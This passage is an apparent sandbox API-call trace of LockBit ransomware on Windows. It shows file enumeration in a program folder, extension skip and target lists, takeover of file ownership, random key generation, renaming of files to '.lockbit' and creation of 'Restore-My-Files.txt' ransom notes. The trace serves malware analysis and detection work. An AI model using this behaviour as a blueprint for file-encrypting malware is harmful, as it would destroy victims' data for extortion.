(lpString1=".dll", lpString2=".dll") returned 0 [0076.829] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b5c53e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc7b5c53e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x43aceae0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1cc000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PipeTran.dll", cAlternateFileName="")) returned 1 [0076.829] lstrcmpiW (lpString1=".", lpString2="PipeTran.dll") returned -1 [0076.829] lstrcmpiW (lpString1="..", lpString2="PipeTran.dll") returned -1 [0076.829] PathFindExtensionW (pszPath="PipeTran.dll") returned=".dll" [0076.829] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.829] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.829] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.829] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.830] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.830] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.830] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.830] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.830] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.830] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.830] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.830] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.831] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.831] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.831] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.831] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13400, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtstreamsink.ax", cAlternateFileName="")) returned 1 [0076.831] lstrcmpiW (lpString1=".", lpString2="rtstreamsink.ax") returned -1 [0076.831] lstrcmpiW (lpString1="..", lpString2="rtstreamsink.ax") returned -1 [0076.831] PathFindExtensionW (pszPath="rtstreamsink.ax") returned=".ax" [0076.831] lstrcmpiW (lpString1=".386", lpString2=".ax") returned -1 [0076.832] lstrcmpiW (lpString1=".cmd", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".exe", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".ani", lpString2=".ax") returned -1 [0076.832] lstrcmpiW (lpString1=".adv", lpString2=".ax") returned -1 [0076.832] lstrcmpiW (lpString1=".theme", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".msi", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".msp", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".com", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".diagpkg", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".nls", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".diagcab", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".lock", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".ocx", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".mpa", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".cpl", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".mod", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".hta", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".icns", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".prf", lpString2=".ax") returned 1 [0076.832] lstrcmpiW (lpString1=".rtp", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".diagcfg", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".msstyles", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".bin", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".shs", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".drv", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".wpx", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".bat", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".rom", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".msc", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".spl", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".ps1", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".msu", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".ics", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".key", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".mp3", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".reg", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".dll", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".ini", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".idx", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".sys", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.833] lstrcmpiW (lpString1=".ico", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".lnk", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".rdp", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".lockbit", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rtstreamsink.ax") returned -1 [0076.834] lstrcmpiW (lpString1="ntldr", lpString2="rtstreamsink.ax") returned -1 [0076.834] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rtstreamsink.ax") returned -1 [0076.834] lstrcmpiW (lpString1="bootsect.bak", lpString2="rtstreamsink.ax") returned -1 [0076.834] lstrcmpiW (lpString1="autorun.inf", lpString2="rtstreamsink.ax") returned -1 [0076.834] lstrcmpiW (lpString1="thumbs.db", lpString2="rtstreamsink.ax") returned 1 [0076.834] lstrcmpiW (lpString1="iconcache.db", lpString2="rtstreamsink.ax") returned -1 [0076.834] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0076.834] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\rtstreamsink.ax") returned=".ax" [0076.834] lstrcmpiW (lpString1=".rar", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".zip", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".7z", lpString2=".ax") returned -1 [0076.834] lstrcmpiW (lpString1=".ckp", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".dacpac", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".db", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".db-shm", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".db-wal", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".db3", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".dbf", lpString2=".ax") returned 1 [0076.834] lstrcmpiW (lpString1=".dbc", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".dbs", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".dbt", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".dbv", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".frm", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".mdf", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".mrg", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".mwb", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".myd", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".ndf", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".qry", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".sdb", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".sdf", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".sql", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".sqlite", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".sqlite3", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".sqlitedb", lpString2=".ax") returned 1 [0076.835] lstrcmpiW (lpString1=".tmd", lpString2=".ax") returned 1 [0076.835] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\rtstreamsink.ax.lockbit") returned 51 [0076.835] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\rtstreamsink.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.837] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.837] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.837] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.837] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.838] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.838] RtlFreeAnsiString (AnsiString="\\") [0076.838] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x3a0) returned 0x0 [0076.838] malloc (_Size=0x200) returned 0x77d800 [0076.838] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0076.838] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.838] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.838] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\rtstreamsink.ax", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.838] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\rtstreamsink.ax", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.839] CloseHandle (hObject=0x3a0) returned 1 [0076.839] free (_Block=0x77d800) [0076.839] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\rtstreamsink.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0076.839] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.839] malloc (_Size=0x40068) returned 0x1ff1e60 [0076.890] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=78848) returned 1 [0076.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0076.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0076.891] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0076.893] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\rtstreamsink.ax.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.893] malloc (_Size=0x7c) returned 0x77de70 [0076.893] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6cf04, FileInformation=0x77de70, Length=0x7c, FileInformationClass=0xa) returned 0x0 [0076.893] free (_Block=0x77de70) [0076.893] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\rtstreamsink.ax" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0076.893] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0076.893] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.894] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtstreamsource.ax", cAlternateFileName="")) returned 1 [0076.894] lstrcmpiW (lpString1=".", lpString2="rtstreamsource.ax") returned -1 [0076.894] lstrcmpiW (lpString1="..", lpString2="rtstreamsource.ax") returned -1 [0076.894] PathFindExtensionW (pszPath="rtstreamsource.ax") returned=".ax" [0076.894] lstrcmpiW (lpString1=".386", lpString2=".ax") returned -1 [0076.894] lstrcmpiW (lpString1=".cmd", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".exe", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".ani", lpString2=".ax") returned -1 [0076.894] lstrcmpiW (lpString1=".adv", lpString2=".ax") returned -1 [0076.894] lstrcmpiW (lpString1=".theme", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".msi", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".msp", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".com", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".diagpkg", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".nls", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".diagcab", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".lock", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".ocx", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".mpa", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".cpl", lpString2=".ax") returned 1 [0076.894] lstrcmpiW (lpString1=".mod", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".hta", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".icns", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".prf", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".rtp", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".diagcfg", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".msstyles", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".bin", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".shs", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".drv", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".wpx", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".bat", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".rom", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".msc", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".spl", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".ps1", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".msu", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".ics", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".key", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".mp3", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".reg", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".dll", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".ini", lpString2=".ax") returned 1 [0076.895] lstrcmpiW (lpString1=".idx", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".sys", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".ico", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".lnk", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".rdp", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".lockbit", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="rtstreamsource.ax") returned -1 [0076.896] lstrcmpiW (lpString1="ntldr", lpString2="rtstreamsource.ax") returned -1 [0076.896] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="rtstreamsource.ax") returned -1 [0076.896] lstrcmpiW (lpString1="bootsect.bak", lpString2="rtstreamsource.ax") returned -1 [0076.896] lstrcmpiW (lpString1="autorun.inf", lpString2="rtstreamsource.ax") returned -1 [0076.896] lstrcmpiW (lpString1="thumbs.db", lpString2="rtstreamsource.ax") returned 1 [0076.896] lstrcmpiW (lpString1="iconcache.db", lpString2="rtstreamsource.ax") returned -1 [0076.896] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0076.896] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\rtstreamsource.ax") returned=".ax" [0076.896] lstrcmpiW (lpString1=".rar", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".zip", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".7z", lpString2=".ax") returned -1 [0076.896] lstrcmpiW (lpString1=".ckp", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".dacpac", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".db", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".db-shm", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".db-wal", lpString2=".ax") returned 1 [0076.896] lstrcmpiW (lpString1=".db3", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".dbf", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".dbc", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".dbs", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".dbt", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".dbv", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".frm", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".mdf", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".mrg", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".mwb", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".myd", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".ndf", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".qry", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".sdb", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".sdf", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".sql", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".sqlite", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".sqlite3", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".sqlitedb", lpString2=".ax") returned 1 [0076.897] lstrcmpiW (lpString1=".tmd", lpString2=".ax") returned 1 [0076.897] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\rtstreamsource.ax.lockbit") returned 53 [0076.897] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\rtstreamsource.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.908] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.908] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.908] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.908] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.909] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.909] RtlFreeAnsiString (AnsiString="\\") [0076.909] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x3ac) returned 0x0 [0076.909] malloc (_Size=0x200) returned 0x77d800 [0076.909] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0076.909] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.909] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.909] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\rtstreamsource.ax", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.909] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\rtstreamsource.ax", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.910] CloseHandle (hObject=0x3ac) returned 1 [0076.910] free (_Block=0x77d800) [0076.910] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\rtstreamsource.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0076.910] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.910] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.911] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=52736) returned 1 [0076.911] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.912] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\rtstreamsource.ax.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.915] malloc (_Size=0x80) returned 0x77de70 [0076.915] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6cf04, FileInformation=0x77de70, 